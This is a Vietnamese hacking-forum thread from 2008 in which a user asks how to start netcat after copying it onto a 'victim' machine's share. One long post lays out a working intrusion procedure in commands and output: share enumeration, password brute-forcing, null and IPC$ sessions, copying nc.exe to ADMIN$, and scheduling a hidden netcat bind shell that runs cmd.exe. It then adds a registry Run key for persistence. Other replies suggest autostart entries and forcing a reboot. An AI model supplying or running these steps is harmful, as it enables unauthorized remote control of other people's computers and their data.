Khởi động netcat sau khi đã cài netcat vào victim

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Khởi động netcat sau khi đã cài netcat vào victim

[Question] Khởi động netcat sau khi đã cài netcat vào victim	07/09/2008 04:41:41 (+0700) \| #1 \| 150074

trojan07
Member

Joined: 05/09/2008 12:12:10
Messages: 3
Offline

Các bạn trong diễn đàn cho mình hỏi, mình không dùng câu lệnh để copy mà dùng tool Essential NetTools và copy trực tiếp chương trinh NC vào thư mục chia sẻ của victim có đường dẫn là \\xxx.xxx.xx.xxx\SharedDocs. Liệu mình có thể dùng câu lệnh nào tiếp theo để khởi động chương trình NC ở máy victim trong trường hợp này?

[Question] Khởi động netcat sau khi đã cài netcat vào victim	07/09/2008 05:13:19 (+0700) \| #2 \| 150079

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

trojan07 wrote:

Các bạn trong diễn đàn cho mình hỏi, mình không dùng câu lệnh để copy mà dùng tool Essential NetTools và copy trực tiếp chương trinh NC vào thư mục chia sẻ của victim có đường dẫn là \\xxx.xxx.xx.xxx\SharedDocs. Liệu mình có thể dùng câu lệnh nào tiếp theo để khởi động chương trình NC ở máy victim trong trường hợp này?
Mình mới tham gia diễn đàn sáng hôm nay, kiến thức thành viên mới như bọn mình còn nhiều hạn chế. Mình biết câu hỏi thuộc dạng phổ thông như thế này sẽ bị xóa hoặc sẽ rất ít người quan tâm trả lời nhưng xin Admin đừng xóa bài của mình, xin hãy cho mình cơ hội để một lần được post bài và nhận câu trả lời của mọi người. Nếu được mình xin ghi nhớ và coi đây là một món quà của Forum tặng cho thành viên mới như mình. Mình xin cám ơn rất nhiều

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

What bringing us together is stronger than what pulling us apart.

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	08/09/2008 01:06:52 (+0700) \| #3 \| 150186

trojan07
Member

Joined: 05/09/2008 12:12:10
Messages: 3
Offline

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

Cảm ơn Conmale đã cho mình một gợi ý, tuy nhiên nếu một người gặp khó khăn về một vấn đề thì lời giải chính là một sự giúo đỡ cần thiết. Mong bạn cho mình một câu trả lời cụ thể.
Thank!

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	08/09/2008 02:06:58 (+0700) \| #4 \| 150192

renewip
Member

Joined: 05/02/2007 02:48:55
Messages: 5
Offline

cách dễ nhất là chạy đến bên máy "victim" rồi mở thư mục đó ra, kick đúp vào file vừa copy vào

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	08/09/2008 02:58:27 (+0700) \| #5 \| 150199

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

trojan07 wrote:

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

Cảm ơn Conmale đã cho mình một gợi ý, tuy nhiên nếu một người gặp khó khăn về một vấn đề thì lời giải chính là một sự giúo đỡ cần thiết. Mong bạn cho mình một câu trả lời cụ thể.
Thank!

Nếu chưa hiểu và chưa phân biệt được 2 đoạn màu đỏ và màu cam ở trên thì câu trả lời cụ thể vô ích. Để hiểu được, phải biết cách sử dụng máy và nắm rõ mình đang làm gì trên máy.

What bringing us together is stronger than what pulling us apart.

[Question] Khởi động netcat sau khi đã cài netcat vào victim	08/09/2008 05:49:10 (+0700) \| #6 \| 150213

hoangm
Member

Joined: 01/05/2008 17:01:06
Messages: 3
Offline

conmale wrote:

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

Em thấy khác nhau hoàn toàn mà.

Lưu trữ khác với thực thi.

[Question] Khởi động netcat sau khi đã cài netcat vào victim	08/09/2008 06:18:48 (+0700) \| #7 \| 150215

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

hoangm wrote:

conmale wrote:

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

Em thấy khác nhau hoàn toàn mà.

Lưu trữ khác với thực thi.

Câu hỏi là "khác nhau chỗ nào", nó có nghĩa là đã khẳng định có sự khác biệt. Câu hỏi trên đâu có hỏi "có khác hay không?" đâu mà trả lời như trên nhỉ?

What bringing us together is stronger than what pulling us apart.

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	15/09/2008 08:48:47 (+0700) \| #8 \| 151301

uhuh
Member

Joined: 30/06/2008 21:24:40
Messages: 6
Offline

cai nay cua nguoi ta viet tui copy cho may u xem thu nghen
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:

CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment
-------------------------------------------------------------------------------
C Disk
PRJA3 Disk
The command completed successfully.
C:\>

Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:

CODE

C:\> net use z: \\x.x.x.x \share
The command completed successfully
.
Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :

CODE

C :\> Nbtstat –A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C

Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt

CODE

“” ADMIN
123456 ADMIN
123456 BODY
“” BODY
…

Sau đó hacker crack bằng lệnh

Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)

CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:

CODE

C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:

CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim

CODE

C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

CODE

C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

Sau đó copy sang máy victim và chạy nha!

Report to moderator Logged
**********************************************************
Vnexperts gives you directions to become IT Experts
Address: P402A - 347 Doi Can - Ba Dinh - HN
Tel: 04.7623389
My e-mail: tocbatdat@yahoo.com

hận đời vô đối

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	15/09/2008 08:51:23 (+0700) \| #9 \| 151302

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Phần mình post thì không códấu, còn phần copy từ chổ khác lại có dấu. Bạn không thấy mắc cở sao bạn.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Khởi động netcat sau khi đã cài netcat vào victim	15/09/2008 12:01:16 (+0700) \| #10 \| 151331

Matrix2987
Member

Joined: 14/06/2008 16:02:07
Messages: 8
Location: Hell
Offline

conmale wrote:

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

khác nhau ở chỗ muốn copy thì chỉ cần có quyền change (thư mục share), còn muốn chạy một lệnh trên máy đó phải kiểm soát toàn bộ được máy đó (quyền admin).

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	16/09/2008 06:06:52 (+0700) \| #11 \| 151456

vnsofts
Member

Joined: 23/07/2006 23:32:05
Messages: 47
Offline

Bạn làm thử thế này để khởi động netcat xem:

- Nhét netcat vào trong file Autoexec.bat, startup hoặc registry của máy victim
- Dùng thêm lệnh Shutdown để khởi động lại máy tính của victim
- Thử telnet đến con netcat xem đã connect được chưa.
- Nếu chưa được thì kiểm tra lại các bước xem

Chúc bạn thành công.

[Question] Khởi động netcat sau khi đã cài netcat vào victim	18/09/2008 00:16:46 (+0700) \| #12 \| 151725

minhtanvltk115
Member

Joined: 17/04/2008 09:45:58
Messages: 6
Offline

conmale wrote:

trojan07 wrote:

Các bạn trong diễn đàn cho mình hỏi, mình không dùng câu lệnh để copy mà dùng tool Essential NetTools và copy trực tiếp chương trinh NC vào thư mục chia sẻ của victim có đường dẫn là \\xxx.xxx.xx.xxx\SharedDocs. Liệu mình có thể dùng câu lệnh nào tiếp theo để khởi động chương trình NC ở máy victim trong trường hợp này?
Mình mới tham gia diễn đàn sáng hôm nay, kiến thức thành viên mới như bọn mình còn nhiều hạn chế. Mình biết câu hỏi thuộc dạng phổ thông như thế này sẽ bị xóa hoặc sẽ rất ít người quan tâm trả lời nhưng xin Admin đừng xóa bài của mình, xin hãy cho mình cơ hội để một lần được post bài và nhận câu trả lời của mọi người. Nếu được mình xin ghi nhớ và coi đây là một món quà của Forum tặng cho thành viên mới như mình. Mình xin cám ơn rất nhiều

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

2 hành động này khác nhau ở chổ
chữ màu đỏ là bình thường , nghĩa là cho dù có copy được file lên đó mà không chạy thì cũng như không, giống nhu 1 file mà không khởi động thì vô ích
chữ màu vàng : có nghĩa là đã khởi động được chương trình ứng dụng smilie

[Question] Khởi động netcat sau khi đã cài netcat vào victim	18/09/2008 06:20:09 (+0700) \| #13 \| 151799

mechk
Member

Joined: 26/01/2007 18:07:00
Messages: 49
Location: đâu
Offline

conmale wrote:

trojan07 wrote:

Các bạn trong diễn đàn cho mình hỏi, mình không dùng câu lệnh để copy mà dùng tool Essential NetTools và copy trực tiếp chương trinh NC vào thư mục chia sẻ của victim có đường dẫn là \\xxx.xxx.xx.xxx\SharedDocs. Liệu mình có thể dùng câu lệnh nào tiếp theo để khởi động chương trình NC ở máy victim trong trường hợp này?
Mình mới tham gia diễn đàn sáng hôm nay, kiến thức thành viên mới như bọn mình còn nhiều hạn chế. Mình biết câu hỏi thuộc dạng phổ thông như thế này sẽ bị xóa hoặc sẽ rất ít người quan tâm trả lời nhưng xin Admin đừng xóa bài của mình, xin hãy cho mình cơ hội để một lần được post bài và nhận câu trả lời của mọi người. Nếu được mình xin ghi nhớ và coi đây là một món quà của Forum tặng cho thành viên mới như mình. Mình xin cám ơn rất nhiều

Thử suy nghĩ xem: hành động copy một file đến máy nào đó và hành động chạy một lệnh trên máy đó từ máy của mình khác nhau ở chỗ nào?

Theo em thì câu trả lời là hành động copy đến một file đến máy nào đó có khác ở chỗ đó là phải dùng cpu của máy mình,còn hành động để chạy một lệnh trên máy đó thì sẽ dùng đến cpu của máy đó,nên ko thể từ máy ta gõ lệnh để máy từ xa thực hiện,vậy vấn đề là ta cần có shell của máy từ xa.nhưng chúng ta có thể sử dụng lệnh at để khởi động một dịch vụ từ xa.
hem biết trả lời vậy có được ko anh comale nhỉ smilie

sắp !

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	29/09/2008 13:32:22 (+0700) \| #14 \| 153329

gdragon
Member

Joined: 20/08/2005 18:41:42
Messages: 119
Offline

uhuh wrote:

CODE

C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

C:\> net use z: \\x.x.x.x \share
The command completed successfully

C :\> Nbtstat –A x.x.x.x

Sao mình đã thử những dòng lệnh này nhưng hoàn toàn không làm được.
Thử trên máy nối cùng router thì không thể nào net view thấy được vì router có firewall. Disible firewall trên router thì cũng không net view được vì máy kia cũng có firewall + firewall của chương trình AV. Nhưng coi trên bài của bạn thì thấy đơn giản quá.

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	25/10/2008 02:08:24 (+0700) \| #15 \| 156454

mechk
Member

Joined: 26/01/2007 18:07:00
Messages: 49
Location: đâu
Offline

khi cài đặt windows thì mặc định là share ipc$,c$..(xem trong computer managment
ta có thề dùng lệnh
Code:

C:\net use \\IP\ipc$ /u:"user" "pass"

nếu các máy ko đặt pass ta có thể dùng user là administrator và pass rỗng
Code:

C:\net use \\IP\ipc$ /u:"administrator" ""

mình đã test nhưng có lẽ chỉ ứng dụng được trong Lan nhưng với wan thì ko được,nhờ mọi người giải thích và cho ý kiến

sắp !

[Question] Re: Khởi động netcat sau khi đã cài netcat vào victim	05/11/2008 16:48:50 (+0700) \| #16 \| 157737

phattrientinhoc
Member

Joined: 15/03/2007 16:05:58
Messages: 11
Offline

C:\> net use \\x.x.x.x\IPC$ “” /user:””

Em dùng winxp2, nhưng sao không vào được phần này. Khi vào thì báo lỗi là "\\x.x.x.x\IPC$ is not accessible" và incorect function. Tại sao vậy nhỉ? Trong khi những ổ trên máy đó thì vẫn vào được bình thường vd:\\x.x.x.x\C$.

Go to:

Users currently in here
1 Anonymous